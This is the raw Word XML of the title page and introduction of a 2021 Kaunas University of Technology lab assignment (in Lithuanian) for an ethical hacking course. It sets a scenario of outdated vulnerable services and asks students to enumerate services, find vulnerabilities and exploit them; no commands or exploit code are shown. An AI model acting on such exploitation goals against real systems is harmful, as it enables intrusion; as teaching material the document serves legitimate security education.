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CD6224" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00165FC0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>KAUNO TECHNOLOGIJOS UNIVERSITETAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343AFB63" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55CAC5A1" w14:textId="4B689E89" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001350E8" w:rsidP="00165FC0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>KOMPIUTERIŲ</w:t>
      </w:r>
      <w:r w:rsidR="001700D3" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> KATEDRA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0C81F6" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DE2975A" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78D5417E" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="283E6AE6" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D97B139" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F76D656" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D097A2E" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FA127D9" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6482BAAC" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="064048A8" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B300548" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00165FC0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Saugumo patikros ir etiško įsilaužimo technologijos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C479A76" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>T120M154</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FD6BB8" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Laboratoriniai darbai</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021A5D4C" w14:textId="2DF51CED" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001350E8" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">NR. </w:t>
      </w:r>
      <w:r w:rsidR="00CC09C3" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4879CBDB" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="038E6097" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="081C24AD" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AB7AD95" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="338AF177" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="745E2EE1" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C3966F9" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21303467" w14:textId="2062B3CD" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="00635B32" w:rsidP="00635B32">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Atliko:</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="51571401" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14A75A3C" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="733D6A8A" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="162D198F" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B3A4C4D" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="668E1F81" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="755B8987" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53B7EEF0" w14:textId="0A056EF0" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00165FC0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Kaunas, </w:t>
      </w:r>
      <w:r w:rsidR="00165FC0" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidR="00CC09C3" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00607DC0" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5256406F" w14:textId="77777777" w:rsidR="001700D3" w:rsidRPr="00607DC0" w:rsidRDefault="001700D3" w:rsidP="00AE7B2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="020FDB04" w14:textId="77777777" w:rsidR="008F3A57" w:rsidRPr="00607DC0" w:rsidRDefault="008F3A57" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Legenda</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041D6692" w14:textId="44AD9B73" w:rsidR="00110871" w:rsidRPr="00607DC0" w:rsidRDefault="005567DF" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Informacinė</w:t>
      </w:r>
      <w:r w:rsidR="00110871" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> sistema naudojama paslaugoms užtikrinti. Tinklo administratorius nebuvo toks pareigingas ir senai nėra atnaujinęs paslaugų („</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00110871" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>services</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00110871" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">“). Dėl šios priežasties virtualioje aplinkoje tiekiamos paslaugos tapo pažeidžiamomis. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F495E3" w14:textId="77777777" w:rsidR="00110871" w:rsidRPr="00607DC0" w:rsidRDefault="00110871" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Tinklų administratorius įvardijo galimus atakų vektorius: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2027196B" w14:textId="24EF444A" w:rsidR="00110871" w:rsidRPr="00607DC0" w:rsidRDefault="00110871" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>IP adresai, tinklo kaukės, paslaugos („</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>services</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>“), prievadai („</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>“);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1706E7FA" w14:textId="13CB4E6D" w:rsidR="00110871" w:rsidRPr="00607DC0" w:rsidRDefault="00110871" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Paliktos saugumo spragos bei perduodant infrastruktūrą nugvelbti slaptažodžiai;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFE2DF2" w14:textId="6AB51960" w:rsidR="00110871" w:rsidRPr="00607DC0" w:rsidRDefault="00110871" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Įsilaužimai į viešai pasiekiamas svetaines, serverius, keičiant turinį, vagiant slaptažodžius;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9333DC" w14:textId="06233134" w:rsidR="00EF602D" w:rsidRPr="00607DC0" w:rsidRDefault="00110871" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Virtualios aplinkos užvaldymas ir netiesioginės vidinių tinklo paslaugų atakos</w:t>
      </w:r>
      <w:r w:rsidR="00F63E73" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F234886" w14:textId="76896530" w:rsidR="00F63E73" w:rsidRPr="00607DC0" w:rsidRDefault="00F63E73" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Pažeidimo įrodymų fiksavimas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C80F8BE" w14:textId="77777777" w:rsidR="00110871" w:rsidRPr="00607DC0" w:rsidRDefault="00110871" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="155777B3" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4913D0B0" w14:textId="58FE2FF6" w:rsidR="00110871" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1. Darbo tikslas</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5797D49C" w14:textId="5707613D" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Nustatyti tinkle veikiančias paslaugas ir jų versijas. Surasti veikiančių paslaugų </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>pažeidžiamumus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>, juos išnaudoti</w:t>
      </w:r>
      <w:r w:rsidR="0058196C" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (įsilaužti)</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C4428E" w14:textId="23F46D88" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00607DC0" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">STUTENTAS pildo gautus rezultatus </w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Jūsų gautas rezultatas</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>pažymėtose vietose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56804C4D" w14:textId="77777777" w:rsidR="00D34404" w:rsidRPr="00607DC0" w:rsidRDefault="00D34404" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
